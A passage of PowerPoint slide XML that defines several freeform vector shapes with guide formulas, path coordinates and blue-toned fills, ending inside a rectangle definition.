                <a:ext cx="7" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 7"/>
                  <a:gd name="T1" fmla="*/ 1 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 1 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 3 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 7"/>
                  <a:gd name="T7" fmla="*/ 6 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 7"/>
                  <a:gd name="T9" fmla="*/ 10 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 7"/>
                  <a:gd name="T11" fmla="*/ 15 h 34"/>
                  <a:gd name="T12" fmla="*/ 0 w 7"/>
                  <a:gd name="T13" fmla="*/ 21 h 34"/>
                  <a:gd name="T14" fmla="*/ 0 w 7"/>
                  <a:gd name="T15" fmla="*/ 27 h 34"/>
                  <a:gd name="T16" fmla="*/ 1 w 7"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 5 w 7"/>
                  <a:gd name="T19" fmla="*/ 34 h 34"/>
                  <a:gd name="T20" fmla="*/ 5 w 7"/>
                  <a:gd name="T21" fmla="*/ 32 h 34"/>
                  <a:gd name="T22" fmla="*/ 5 w 7"/>
                  <a:gd name="T23" fmla="*/ 29 h 34"/>
                  <a:gd name="T24" fmla="*/ 4 w 7"/>
                  <a:gd name="T25" fmla="*/ 25 h 34"/>
                  <a:gd name="T26" fmla="*/ 4 w 7"/>
                  <a:gd name="T27" fmla="*/ 21 h 34"/>
                  <a:gd name="T28" fmla="*/ 4 w 7"/>
                  <a:gd name="T29" fmla="*/ 15 h 34"/>
                  <a:gd name="T30" fmla="*/ 4 w 7"/>
                  <a:gd name="T31" fmla="*/ 10 h 34"/>
                  <a:gd name="T32" fmla="*/ 4 w 7"/>
                  <a:gd name="T33" fmla="*/ 4 h 34"/>
                  <a:gd name="T34" fmla="*/ 7 w 7"/>
                  <a:gd name="T35" fmla="*/ 1 h 34"/>
                  <a:gd name="T36" fmla="*/ 7 w 7"/>
                  <a:gd name="T37" fmla="*/ 1 h 34"/>
                  <a:gd name="T38" fmla="*/ 7 w 7"/>
                  <a:gd name="T39" fmla="*/ 0 h 34"/>
                  <a:gd name="T40" fmla="*/ 5 w 7"/>
                  <a:gd name="T41" fmla="*/ 0 h 34"/>
                  <a:gd name="T42" fmla="*/ 5 w 7"/>
                  <a:gd name="T43" fmla="*/ 0 h 34"/>
                  <a:gd name="T44" fmla="*/ 5 w 7"/>
                  <a:gd name="T45" fmla="*/ 0 h 34"/>
                  <a:gd name="T46" fmla="*/ 4 w 7"/>
                  <a:gd name="T47" fmla="*/ 0 h 34"/>
                  <a:gd name="T48" fmla="*/ 3 w 7"/>
                  <a:gd name="T49" fmla="*/ 0 h 34"/>
                  <a:gd name="T50" fmla="*/ 2 w 7"/>
                  <a:gd name="T51" fmla="*/ 1 h 3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34"/>
                  <a:gd name="T80" fmla="*/ 7 w 7"/>
                  <a:gd name="T81" fmla="*/ 34 h 3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34">
                    <a:moveTo>
                      <a:pt x="2" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10750" name="Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1367" y="2245"/>
                <a:ext cx="24" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 1 h 91"/>
                  <a:gd name="T2" fmla="*/ 22 w 24"/>
                  <a:gd name="T3" fmla="*/ 1 h 91"/>
                  <a:gd name="T4" fmla="*/ 21 w 24"/>
                  <a:gd name="T5" fmla="*/ 4 h 91"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 8 h 91"/>
                  <a:gd name="T8" fmla="*/ 17 w 24"/>
                  <a:gd name="T9" fmla="*/ 16 h 91"/>
                  <a:gd name="T10" fmla="*/ 15 w 24"/>
                  <a:gd name="T11" fmla="*/ 28 h 91"/>
                  <a:gd name="T12" fmla="*/ 14 w 24"/>
                  <a:gd name="T13" fmla="*/ 43 h 91"/>
                  <a:gd name="T14" fmla="*/ 15 w 24"/>
                  <a:gd name="T15" fmla="*/ 64 h 91"/>
                  <a:gd name="T16" fmla="*/ 18 w 24"/>
                  <a:gd name="T17" fmla="*/ 91 h 91"/>
                  <a:gd name="T18" fmla="*/ 5 w 24"/>
                  <a:gd name="T19" fmla="*/ 91 h 91"/>
                  <a:gd name="T20" fmla="*/ 4 w 24"/>
                  <a:gd name="T21" fmla="*/ 88 h 91"/>
                  <a:gd name="T22" fmla="*/ 3 w 24"/>
                  <a:gd name="T23" fmla="*/ 81 h 91"/>
                  <a:gd name="T24" fmla="*/ 1 w 24"/>
                  <a:gd name="T25" fmla="*/ 70 h 91"/>
                  <a:gd name="T26" fmla="*/ 0 w 24"/>
                  <a:gd name="T27" fmla="*/ 56 h 91"/>
                  <a:gd name="T28" fmla="*/ 0 w 24"/>
                  <a:gd name="T29" fmla="*/ 42 h 91"/>
                  <a:gd name="T30" fmla="*/ 1 w 24"/>
                  <a:gd name="T31" fmla="*/ 27 h 91"/>
                  <a:gd name="T32" fmla="*/ 4 w 24"/>
                  <a:gd name="T33" fmla="*/ 13 h 91"/>
                  <a:gd name="T34" fmla="*/ 7 w 24"/>
                  <a:gd name="T35" fmla="*/ 0 h 91"/>
                  <a:gd name="T36" fmla="*/ 24 w 24"/>
                  <a:gd name="T37" fmla="*/ 1 h 9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91"/>
                  <a:gd name="T59" fmla="*/ 24 w 24"/>
                  <a:gd name="T60" fmla="*/ 91 h 9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91">
                    <a:moveTo>
                      <a:pt x="24" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10751" name="Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1368" y="2252"/>
                <a:ext cx="19" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 19 w 19"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 18 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 77"/>
                  <a:gd name="T6" fmla="*/ 17 w 19"/>
                  <a:gd name="T7" fmla="*/ 7 h 77"/>
                  <a:gd name="T8" fmla="*/ 14 w 19"/>
                  <a:gd name="T9" fmla="*/ 13 h 77"/>
                  <a:gd name="T10" fmla="*/ 13 w 19"/>
                  <a:gd name="T11" fmla="*/ 23 h 77"/>
                  <a:gd name="T12" fmla="*/ 12 w 19"/>
                  <a:gd name="T13" fmla="*/ 36 h 77"/>
                  <a:gd name="T14" fmla="*/ 13 w 19"/>
                  <a:gd name="T15" fmla="*/ 54 h 77"/>
                  <a:gd name="T16" fmla="*/ 14 w 19"/>
                  <a:gd name="T17" fmla="*/ 77 h 77"/>
                  <a:gd name="T18" fmla="*/ 4 w 19"/>
                  <a:gd name="T19" fmla="*/ 77 h 77"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 75 h 77"/>
                  <a:gd name="T22" fmla="*/ 3 w 19"/>
                  <a:gd name="T23" fmla="*/ 69 h 77"/>
                  <a:gd name="T24" fmla="*/ 2 w 19"/>
                  <a:gd name="T25" fmla="*/ 60 h 77"/>
                  <a:gd name="T26" fmla="*/ 0 w 19"/>
                  <a:gd name="T27" fmla="*/ 48 h 77"/>
                  <a:gd name="T28" fmla="*/ 0 w 19"/>
                  <a:gd name="T29" fmla="*/ 35 h 77"/>
                  <a:gd name="T30" fmla="*/ 0 w 19"/>
                  <a:gd name="T31" fmla="*/ 22 h 77"/>
                  <a:gd name="T32" fmla="*/ 3 w 19"/>
                  <a:gd name="T33" fmla="*/ 11 h 77"/>
                  <a:gd name="T34" fmla="*/ 6 w 19"/>
                  <a:gd name="T35" fmla="*/ 0 h 77"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 7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77"/>
                  <a:gd name="T59" fmla="*/ 19 w 19"/>
                  <a:gd name="T60" fmla="*/ 77 h 7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77">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10752" name="Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2258"/>
                <a:ext cx="15" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 1 h 64"/>
                  <a:gd name="T4" fmla="*/ 14 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 64"/>
                  <a:gd name="T6" fmla="*/ 12 w 15"/>
                  <a:gd name="T7" fmla="*/ 6 h 64"/>
                  <a:gd name="T8" fmla="*/ 11 w 15"/>
                  <a:gd name="T9" fmla="*/ 12 h 64"/>
                  <a:gd name="T10" fmla="*/ 10 w 15"/>
                  <a:gd name="T11" fmla="*/ 20 h 64"/>
                  <a:gd name="T12" fmla="*/ 9 w 15"/>
                  <a:gd name="T13" fmla="*/ 30 h 64"/>
                  <a:gd name="T14" fmla="*/ 10 w 15"/>
                  <a:gd name="T15" fmla="*/ 45 h 64"/>
                  <a:gd name="T16" fmla="*/ 11 w 15"/>
                  <a:gd name="T17" fmla="*/ 64 h 64"/>
                  <a:gd name="T18" fmla="*/ 2 w 15"/>
                  <a:gd name="T19" fmla="*/ 64 h 64"/>
                  <a:gd name="T20" fmla="*/ 2 w 15"/>
                  <a:gd name="T21" fmla="*/ 62 h 64"/>
                  <a:gd name="T22" fmla="*/ 1 w 15"/>
                  <a:gd name="T23" fmla="*/ 57 h 64"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>
                  <a:gd name="T25" fmla="*/ 49 h 64"/>
                  <a:gd name="T26" fmla="*/ 0 w 15"/>
                  <a:gd name="T27" fmla="*/ 40 h 64"/>
                  <a:gd name="T28" fmla="*/ 0 w 15"/>
                  <a:gd name="T29" fmla="*/ 29 h 64"/>
                  <a:gd name="T30" fmla="*/ 0 w 15"/>
                  <a:gd name="T31" fmla="*/ 19 h 64"/>
                  <a:gd name="T32" fmla="*/ 1 w 15"/>
                  <a:gd name="T33" fmla="*/ 8 h 64"/>
                  <a:gd name="T34" fmla="*/ 4 w 15"/>
                  <a:gd name="T35" fmla="*/ 0 h 64"/>
                  <a:gd name="T36" fmla="*/ 15 w 15"/>
                  <a:gd name="T37" fmla="*/ 0 h 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64"/>
                  <a:gd name="T59" fmla="*/ 15 w 15"/>
                  <a:gd name="T60" fmla="*/ 64 h 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64">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10753" name="Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2264"/>
                <a:ext cx="12" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 51"/>
                  <a:gd name="T2" fmla="*/ 12 w 12"/>
                  <a:gd name="T3" fmla="*/ 1 h 51"/>
                  <a:gd name="T4" fmla="*/ 11 w 12"/>
                  <a:gd name="T5" fmla="*/ 2 h 51"/>
                  <a:gd name="T6" fmla="*/ 10 w 12"/>
                  <a:gd name="T7" fmla="*/ 4 h 51"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 9 h 51"/>
                  <a:gd name="T10" fmla="*/ 9 w 12"/>
                  <a:gd name="T11" fmla="*/ 16 h 51"/>
                  <a:gd name="T12" fmla="*/ 8 w 12"/>
                  <a:gd name="T13" fmla="*/ 24 h 51"/>
                  <a:gd name="T14" fmla="*/ 8 w 12"/>
                  <a:gd name="T15" fmla="*/ 36 h 51"/>
                  <a:gd name="T16" fmla="*/ 9 w 12"/>
                  <a:gd name="T17" fmla="*/ 51 h 51"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 51 h 51"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 50 h 51"/>
                  <a:gd name="T22" fmla="*/ 2 w 12"/>
                  <a:gd name="T23" fmla="*/ 45 h 51"/>
                  <a:gd name="T24" fmla="*/ 1 w 12"/>
                  <a:gd name="T25" fmla="*/ 39 h 51"/>
                  <a:gd name="T26" fmla="*/ 1 w 12"/>
                  <a:gd name="T27" fmla="*/ 31 h 51"/>
                  <a:gd name="T28" fmla="*/ 0 w 12"/>
                  <a:gd name="T29" fmla="*/ 23 h 51"/>
                  <a:gd name="T30" fmla="*/ 1 w 12"/>
                  <a:gd name="T31" fmla="*/ 15 h 51"/>
                  <a:gd name="T32" fmla="*/ 2 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 51"/>
                  <a:gd name="T34" fmla="*/ 4 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 51"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 1 h 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51"/>
                  <a:gd name="T59" fmla="*/ 12 w 12"/>
                  <a:gd name="T60" fmla="*/ 51 h 5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51">
                    <a:moveTo>
                      <a:pt x="12" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10754" name="Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1371" y="2271"/>
                <a:ext cx="9" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 37"/>
                  <a:gd name="T6" fmla="*/ 8 w 9"/>
                  <a:gd name="T7" fmla="*/ 3 h 37"/>
                  <a:gd name="T8" fmla="*/ 7 w 9"/>
                  <a:gd name="T9" fmla="*/ 6 h 37"/>
                  <a:gd name="T10" fmla="*/ 6 w 9"/>
                  <a:gd name="T11" fmla="*/ 10 h 37"/>
                  <a:gd name="T12" fmla="*/ 6 w 9"/>
                  <a:gd name="T13" fmla="*/ 17 h 37"/>
                  <a:gd name="T14" fmla="*/ 6 w 9"/>
                  <a:gd name="T15" fmla="*/ 25 h 37"/>
                  <a:gd name="T16" fmla="*/ 7 w 9"/>
                  <a:gd name="T17" fmla="*/ 37 h 37"/>
                  <a:gd name="T18" fmla="*/ 2 w 9"/>
                  <a:gd name="T19" fmla="*/ 37 h 37"/>
                  <a:gd name="T20" fmla="*/ 1 w 9"/>
                  <a:gd name="T21" fmla="*/ 36 h 37"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 32 h 37"/>
                  <a:gd name="T24" fmla="*/ 1 w 9"/>
                  <a:gd name="T25" fmla="*/ 28 h 37"/>
                  <a:gd name="T26" fmla="*/ 0 w 9"/>
                  <a:gd name="T27" fmla="*/ 23 h 37"/>
                  <a:gd name="T28" fmla="*/ 0 w 9"/>
                  <a:gd name="T29" fmla="*/ 16 h 37"/>
                  <a:gd name="T30" fmla="*/ 0 w 9"/>
                  <a:gd name="T31" fmla="*/ 10 h 37"/>
                  <a:gd name="T32" fmla="*/ 1 w 9"/>
                  <a:gd name="T33" fmla="*/ 4 h 37"/>
                  <a:gd name="T34" fmla="*/ 3 w 9"/>
                  <a:gd name="T35" fmla="*/ 0 h 37"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 0 h 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37"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>
                  <a:gd name="T60" fmla="*/ 37 h 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37">
                    <a:moveTo>
                      <a:pt x="9" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10755" name="Rectangle 162"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2261"/>
                <a:ext cx="4" cy="118"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
